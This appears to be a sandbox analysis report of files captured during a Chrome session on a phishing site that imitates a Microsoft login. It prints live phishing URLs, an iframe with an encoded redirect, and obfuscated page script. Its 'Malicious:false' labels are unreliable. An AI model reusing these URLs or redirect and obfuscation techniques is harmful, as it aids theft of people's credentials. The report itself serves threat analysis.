                                                    SHA-512:A0ECE4FBB9B09D6A008E3894A833EC6780C47186DDDDA23EBE42C0B800091849C6D14B6C4AF04AC30184179271A1FA58D8E6C7DF3F434365E6113A730116610A
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,........b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z&.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z0.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z0.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z0............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z1............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............m......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 20:33:33 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2677
                                                    Entropy (8bit):3.989365898330272
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:003302380CDFFE161B6DDC405D930CFB
                                                    SHA1:2E57829EB388336AFC0284755EF42ADFEC68E5DB
                                                    SHA-256:19C9E075CF7FBF178EFF80C1D2417A206567A98A20A8A168A2BF57925DE6C667
                                                    SHA-512:820630A7CF09C6010A531EB2D158D35848B2C14A1C2D177110FC45A74F66E16BE47A7A7491984AF9B2DAE96AB779082C9025ABD9939D9D89C59A84FFCB3E2202
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,.....:...b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z&.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z0.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z0.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z0............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z1............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............m......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Jan 8 20:33:32 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                    Category:dropped
                                                    Size (bytes):2679
                                                    Entropy (8bit):4.000306937440964
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F90DA442AB8D643BFB125B283FA700A3
                                                    SHA1:FCC94D244771CFBC446CA2EF8696E370889F346B
                                                    SHA-256:6D3A9ADC9CDFCA0371DE1E60A45837210D22602578C0E31A66DF165813B41DD8
                                                    SHA-512:09AB9AF2676CEC2FB6516ABEA50FA95E8D284439143F845D8032E9CB0BDB5CE14510736CA6FDCB7F850C16807D2C52FF1946B94B0FFDF4E368EBA61E05F97332
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:L..................F.@.. ...$+.,.....d...b..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I(Z&.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V(Z0.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V(Z0.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V(Z0............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V(Z1............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............m......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PDF document, version 1.7, 2 pages
                                                    Category:dropped
                                                    Size (bytes):0
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C5913DCF3469D1B4DC57CF7B2F8DE29B
                                                    SHA1:E6F31404A1A89927FBF51713971FFE406B10760A
                                                    SHA-256:359A2C6275E4AED4C97BF72689A9914EB5AD2EED1E35B40ABED6606DD5A8842F
                                                    SHA-512:631EEC18593270714B971DDCFF9419EDD3EA25F3D5F359288203545222A5F065865B93EBAC5FEF79A66C08FA569E589B84BEAB946FAF877363C3FC7B9DF47CEB
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 28 0 R/MarkInfo<</Marked true>>/Metadata 125 0 R/ViewerPreferences 126 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 25 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 13 0 R/F5 16 0 R/F6 18 0 R/F7 20 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image23 23 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 15 0 R 22 0 R] /MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 1762>>..stream..x..Z.n.F.}.....A.....A..N.....j.".*..[.%9A..3KR.....8...^.........Yp..f.....^..f.n...6.v....5..9........}....0.5...6\.._../..........gL..6..Yo49.."y.......f:.w;.o....v.....B..p..V....yw..x.....e....Z.u;_z,...?t;op.O.?{....:[.\...v.w..S..........Q..*$m.(.T2A...C..OPVA.]%B.6p.:.J:.[1...4./.H%v.\.f9.T.-..)..q...%(....\.&..vR..q.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PDF document, version 1.7, 2 pages
                                                    Category:dropped
                                                    Size (bytes):148233
                                                    Entropy (8bit):7.9362684511193065
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C5913DCF3469D1B4DC57CF7B2F8DE29B
                                                    SHA1:E6F31404A1A89927FBF51713971FFE406B10760A
                                                    SHA-256:359A2C6275E4AED4C97BF72689A9914EB5AD2EED1E35B40ABED6606DD5A8842F
                                                    SHA-512:631EEC18593270714B971DDCFF9419EDD3EA25F3D5F359288203545222A5F065865B93EBAC5FEF79A66C08FA569E589B84BEAB946FAF877363C3FC7B9DF47CEB
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 28 0 R/MarkInfo<</Marked true>>/Metadata 125 0 R/ViewerPreferences 126 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 25 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 13 0 R/F5 16 0 R/F6 18 0 R/F7 20 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image23 23 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 15 0 R 22 0 R] /MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 1762>>..stream..x..Z.n.F.}.....A.....A..N.....j.".*..[.%9A..3KR.....8...^.........Yp..f.....^..f.n...6.v....5..9........}....0.5...6\.._../..........gL..6..Yo49.."y.......f:.w;.o....v.....B..p..V....yw..x.....e....Z.u;_z,...?t;op.O.?{....:[.\...v.w..S..........Q..*$m.(.T2A...C..OPVA.]%B.6p.:.J:.[1...4./.H%v.\.f9.T.-..)..q...%(....\.&..vR..q.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:PDF document, version 1.7, 2 pages
                                                    Category:dropped
                                                    Size (bytes):15585
                                                    Entropy (8bit):7.708580679574045
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F689FEFAFF07138FED9E67AF521D62DA
                                                    SHA1:0DF6F911F4CFA26BFEFE11B9BFC349152E477F62
                                                    SHA-256:203DD404D8DF84321C258B8E723F5118DD122A3B252096F8C43DF1C7845C6DBA
                                                    SHA-512:E5662160478CEBE7B28B9001B00ABD42C6275B4DAEFE2034C184DD7FC11C85D0B0272359220DD779B4FB9636AB145787CE0C66A6A2E39F59EA5D9F801787F2F4
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:%PDF-1.7..%......1 0 obj..<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 28 0 R/MarkInfo<</Marked true>>/Metadata 125 0 R/ViewerPreferences 126 0 R>>..endobj..2 0 obj..<</Type/Pages/Count 2/Kids[ 3 0 R 25 0 R] >>..endobj..3 0 obj..<</Type/Page/Parent 2 0 R/Resources<</Font<</F1 5 0 R/F2 9 0 R/F3 11 0 R/F4 13 0 R/F5 16 0 R/F6 18 0 R/F7 20 0 R>>/ExtGState<</GS7 7 0 R/GS8 8 0 R>>/XObject<</Image23 23 0 R>>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/Annots[ 15 0 R 22 0 R] /MediaBox[ 0 0 612 792] /Contents 4 0 R/Group<</Type/Group/S/Transparency/CS/DeviceRGB>>/Tabs/S/StructParents 0>>..endobj..4 0 obj..<</Filter/FlateDecode/Length 1762>>..stream..x..Z.n.F.}.....A.....A..N.....j.".*..[.%9A..3KR.....8...^.........Yp..f.....^..f.n...6.v....5..9........}....0.5...6\.._../..........gL..6..Yo49.."y.......f:.w;.o....v.....B..p..V....yw..x.....e....Z.u;_z,...?t;op.O.?{....:[.\...v.w..S..........Q..*$m.(.T2A...C..OPVA.]%B.6p.:.J:.[1...4./.H%v.\.f9.T.-..)..q...%(....\.&..vR..q.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text
                                                    Category:dropped
                                                    Size (bytes):472
                                                    Entropy (8bit):5.485405961513253
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:408FA189924DFB477965D2CD8F11BA9E
                                                    SHA1:04630E05C2BE4D5AE5ECE973765D0C4A44E7A009
                                                    SHA-256:C501805B1EA34E06825CDB6E5A9C77A0D5EF9CEF25FFB87366EAC5FAFDC6371A
                                                    SHA-512:8B4F2C3FFC9D36167A34AF663781113BA6B6042269EDA45FE86655466799FB60C6A3E285CD987652149E418F34D82533847B2AAF3480F9B0129AE3D04FFBB6D2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:<html lang="en">.<head>. <meta charset="UTF-8">. <meta name="viewport" content="width=device-width, initial-scale=1.0">. <title></title>.</head>.<body>. <iframe height="100%" width="100%" sandbox="allow-top-navigation allow-scripts allow-same-origin" src="https://2m4n7ipjuhmgujm.xbslqfequn.workers.dev?f22445=aHR0cHM6Ly9sb2dpbi5wZ3VobXhjZ2dyb3VwLnRvcC8/QjY2MmdPOENXMEU9YUhSMGNITTZMeTl2Wm1acFkyVXVZMjl0" frameborder="0" </iframe>.. </iframe>.</body>.</html>
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (512)
                                                    Category:dropped
                                                    Size (bytes):11970
                                                    Entropy (8bit):5.416120131770621
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:39A0EB35CD7799A181D34F4AE1DDB496
                                                    SHA1:E933CA8534BCB6AD79D240316CE23C8B870050D0
                                                    SHA-256:C8CEF105FCAF7CBF3F8682C861045505C24D41CF6686C20C1C03E14031A3DB69
                                                    SHA-512:0AE990F9B57B55C3A8025BBE13C98ECD8A40C38380F9E0EFEF2BE7B418642EB040E4C537E684D2FEF7E04113450CFD4DEFF3414310773177220209991BBF1643
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:/*! ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise. .. * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain..Provided for Informational Purposes Only..Public Domain. .NO WARRANTY EXPRESSED OR IMPLIED. USE AT YOUR OWN RISK..----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------ */."object"!=typeof JSON&&(JSON={}),
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):4
                                                    Entropy (8bit):1.5
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:3F8810D1811A346E228294E50BE5054C
                                                    SHA1:25304802451A85F8B19997553D3A4D35C2AFC7F8
                                                    SHA-256:E7F429B492932F8E097ECEE52691099F84657249BBC75BEF667C1B1476660C40
                                                    SHA-512:8467F2FB49E636D25B476AA7567A556269BDC39B38FC27082AF13CE0627E45713CEFB615EA7B823D67B8FB0932D4892D5A8F38C38EFC0590E07ECE2D74EED1B3
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://login.pguhmxcggroup.top/?authvp=921854-d02b859dd62d60414e0f030ea1af8c68d6390ad945af886997714c3d8f17b328
                                                    Preview:$$wL
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (2054)
                                                    Category:downloaded
                                                    Size (bytes):9285
                                                    Entropy (8bit):5.397876465825329
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:439A53994F1A9C860C7787ED5100CA0C
                                                    SHA1:15BA120F64BBF6A59A457841B10DF0D6D1B4574C
                                                    SHA-256:441BFA485FB0EB8AD2BE7001209868B57C41769CAE9512A774419F5882C093E6
                                                    SHA-512:FB6002797BD9E28A352BCBE4643BC7E998C562218D9189AE879E1DC605BC79C3234435029B46667724E5C85A475A72C8DDDED17E3EEFD7791EC1FB21822D3804
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://newnewdomnewbjbfcjfidd.pguhmxcggroup.top/ests/2.1/content/cdnbundles/watson.min_q5ptmu8aniymd4ftuqdkda2.js
                                                    Preview:!function(){function e(){return(x.location.protocol||"").concat("//",x.location.hostname||x.location.host)}function r(e){if(e){try{var r=/function (.{1,})\(/,n=r.exec(e.constructor.toString());return n&&n.length>1?n[1]:""}catch(e){}}return""}function n(e,r,n){if(e&&r){n||(e=e.toLowerCase());for(var t=0;t<r.length;t++){var o=r[t];if(o&&(n||(o=o.toLowerCase()),e.indexOf(o)>=0)){return r[t]}}}return null}function t(e,r,n){return!!(0===n&&r&&r.indexOf("Script error.")>=0)}function o(e,r){.if(!e.expectedVersion||e.expectedVersion!==E().jquery){if(r&&r.indexOf("jQuery.easing[jQuery.easing.def] is not a function")>=0){return!0}if(r&&r.indexOf("The bound jQuery version is not the expected version -- loaded")>=0){return!0}}return!1}function i(e){if(e){try{if("string"!==E.type(e)&&JSON&&JSON.stringify){var n=r(e),t=JSON.stringify(e);return t&&"{}"!==t||(e.error&&(e=e.error,n=r(e)),(t=JSON.stringify(e))&&"{}"!==t||(t=e.toString())),n+":"+t}}catch(e){}}return""+(e||"")}function a(e,r){return{."sig
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):190159
                                                    Entropy (8bit):5.348806457586607
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:0A611EBA4D6F3E0D4DE8F64BAA5AFEB4
                                                    SHA1:E9766EB0944C934C264291D10116986EECE92565
                                                    SHA-256:490CBC100E1B047AC625957FFC14DC203621E9ADEBC66D8E68D51A496DEAD03C
                                                    SHA-512:3D3A2360EB8EBA14284E13D1240ECD4E43514C96EF2AAD3B78BB76175E74BF641359E9AD5FAD062FDDAA2024BBE4B595574B82ACF07B447D118E6A1B51D403DE
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:(window.telemetry_webpackJsonp=window.telemetry_webpackJsonp||[]).push([[2],[,,,function(e,t,n){"use strict";n.r(t),n.d(t,"ValueKind",(function(){return r.e})),n.d(t,"EventLatency",(function(){return r.a})),n.d(t,"EventPersistence",(function(){return r.b})),n.d(t,"TraceLevel",(function(){return r.d})),n.d(t,"AppInsightsCore",(function(){return i.a})),n.d(t,"BaseCore",(function(){return d})),n.d(t,"_ExtendedInternalMessageId",(function(){return r.f})),n.d(t,"EventPropertyType",(function(){return r.c})),n.d(t,"ESPromise",(function(){return g})),n.d(t,"ESPromiseScheduler",(function(){return C})),n.d(t,"ValueSanitizer",(function(){return I})),n.d(t,"NotificationManager",(function(){return E.a})),n.d(t,"BaseTelemetryPlugin",(function(){return S.a})),n.d(t,"ProcessTelemetryContext",(function(){return N.a})),n.d(t,"MinChannelPriorty",(function(){return w.a})),n.d(t,"EventsDiscardedReason",(function(){return P.a})),n.d(t,"DiagnosticLogger",(function(){return c.a})),n.d(t,"LoggingSeverity",(fun
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (46603)
                                                    Category:dropped
                                                    Size (bytes):142388
                                                    Entropy (8bit):5.430871207005334
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4A59B33F7EBC44A3E9D9C4AE9305436F
                                                    SHA1:CB87AA37406D9D1F3B77A51CB7FFCA844907043E
                                                    SHA-256:F69446A5CFDE4583BC13645012E809A54F661539B7B5B05719E55FBE6514B261
                                                    SHA-512:5AE8790094EA6D9C8A5F2D3AC5A1EEE58CEA32962B0A255D9B12BD52F2E9308F3155A994BE0706A6B1AE91343A38A735E99F0021EB911CC10783418FD828D4B0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */!function(e){function t(t){for(var n,r,i=t[0],a=t[1],s=0,u=[];s<i.length;s++)
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (6030)
                                                    Category:downloaded
                                                    Size (bytes):7464
                                                    Entropy (8bit):5.722799850866447
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:0B5D1CB12F35458F8CCCF9856CF8F8DC
                                                    SHA1:B543B6212126B7AD4D75D60D3114A8B825B49F8D
                                                    SHA-256:AD38F84D7362A2CB25F70ADA7E686A52C7A9B6444EF219A6B6FDFB028A10C4A8
                                                    SHA-512:6DE06908D86C9B733B30674A5486645EE8AB67801396487E9188308F5C2A5CBAEAB857A18643B755099465F9F268999ACA2F4579E910BEC95BACF7329833C09C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://jackoffjackofflilliilkillxoopoeadonline.top/drive
                                                    Preview:<!DOCTYPE html>.<html>.<head>.<meta charset="utf-8" />.<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />.<meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />.<meta name="robots" content="noindex, nofollow" />. Start: Ad code and script tags for header of page -->. End: Ad code and script tags for header of page -->.<script type="text/javascript" charset="utf-8" data-cfasync="false">var _0510567="AgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkb2N1bWVudC5mb3Jtc1swXS5zdWJtaXQoKTsKICB9IGVsc2UgewogICAgICAgICAgICAgICAgICAgaWYgKCF3aW5kb3cubG9jYXRpb24uaGFzaCkgewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLmhyZWYgPSB3aW5kb3cubG9jYXRpb24uaHJlZjsKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2luZG93LmxvY2F0aW9uLnJlbG9hZCgpOwogICAgICAgICAgICAgICAgICA
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with no line terminators
                                                    Category:downloaded
                                                    Size (bytes):28
                                                    Entropy (8bit):4.378783493486175
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:4C42AB4890733A2B01B1B3269C4855E7
                                                    SHA1:5B68BFE664DCBC629042EA45C23954EEF1A9F698
                                                    SHA-256:F69E8FC1414A82F108CFA0725E5211AF1865A9CEA342A5F01E6B2B5ABE47E010
                                                    SHA-512:0631C6EFD555699CB2273107FE5AF565FEC2234344E2D412C23E4EE43C6D721CB2B058764622E44FD544D840FF64D7C866565E280127C701CAAB0A48C35D4F5C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwmbqIqwnw2_4xIFDYOoWz0SBQ3OQUx6?alt=proto
                                                    Preview:ChIKBw2DqFs9GgAKBw3OQUx6GgA=
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:HTML document, ASCII text, with very long lines (3390)
                                                    Category:dropped
                                                    Size (bytes):6115
                                                    Entropy (8bit):5.541428890690902
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:E7EEECACA8DD0BE3490BF60254B25C0A
                                                    SHA1:BAF0C816243F2A450B8E4FF7DE793E4C43824FE9
                                                    SHA-256:A8FFA5A4FC9FE65725B7885F88755864FC571A6D3FD83E9C94D7349866D9F7AC
                                                    SHA-512:5233E25CC4792F38A2B6F5124415FF816EA142C0BEC280977E627DE3D4B1C40A15E834B47D2AACA418B355C559F45F67E2381EE621689B9BCEAFD402CE990683
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:.<html lang="en">.<head>..<title></title>.. <p>However, pineapples have begun to rent flies over the past few months, specifically for bees associated with their blueberries!</p> -->..<meta charset="UTF-8">..<meta name="robots" content="noindex, nofollow">..<meta name="viewport" content="width=device-width, initial-scale=1.0">..<script src="https://challenges.cloudflare.com/turnstile/v0/api.js"></script>.. <p>However, currants have begun to rent melons over the past few months, specifically for foxes associated with their spiders.</p> -->..<style>body{font-family:Arial,sans-serif}.container{margin-top:50px;display:flex;justify-content:center}.centered-content{text-align:center;max-width:500px}.fs-5{font-size:1.25rem;display:block}.mt-2{margin-top:.5rem}.mt-5{margin-top:3rem}.text-muted{color:#6c757d}</style>.</head>.<body>... <div>However, monkeys have begun to rent blackberries over the past few months, specifically for pears associated with their plums.</div> -->...<div c
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (64612)
                                                    Category:dropped
                                                    Size (bytes):113769
                                                    Entropy (8bit):5.492343205210805
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:9F02E24CD4E7788D28587C2B1CB504E7
                                                    SHA1:59DA2FC24777CD180F6D3A3F7CE9D9DD90520430
                                                    SHA-256:C30FD6BB912661057EC2EEA9A2F135303A6D0F8D110BF11493B369286F0587AE
                                                    SHA-512:95276C7F1BBA2777F02E7CD3674CD0E967C96F0E0FC88C0862E82A7455A6C7D6CC90A23F9623412B3696F39F8C4069B17DC8FDF16C03003165D398E2080CAD57
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:/*!. * ------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------. * . * This file is based on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise.. * . * json2.js (2016-05-01). * https://github.com/douglascrockford/JSON-js. * License: Public Domain. * . * Provided for Informational Purposes Only. * . * ----------------------------------------------- END OF THIRD PARTY NOTICE ------------------------------------------. */.(window.webpackJsonp=window.webpackJsonp||[]).push([[37],{1379:function(e,t,
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:GIF image data, version 89a, 352 x 3
                                                    Category:downloaded
                                                    Size (bytes):3620
                                                    Entropy (8bit):6.867828878374734
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                    SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                    SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                    SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://newnewdomnewbjbfcjfidd.pguhmxcggroup.top/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif
                                                    Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (8721), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):8721
                                                    Entropy (8bit):5.737752145691965
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:6FEA028998E7C2298D5CA28F0B92F6AA
                                                    SHA1:FC8A3868B54FD612254AEAE18220FC3F520D8A7D
                                                    SHA-256:169A8A8A41D013B09C6FEC7D75BF89F3D6CD4BD163B2BC79A583239E1E26DC57
                                                    SHA-512:FD75CD51B509E01E8074849405370A9071EC8B28722E944BA41B1BC683B257EB96BDF3CCB2B065F96115916C8B0BF93FBE211AC663455439D8A2213CE7276FED
                                                    Malicious:false
                                                    Reputation:unknown
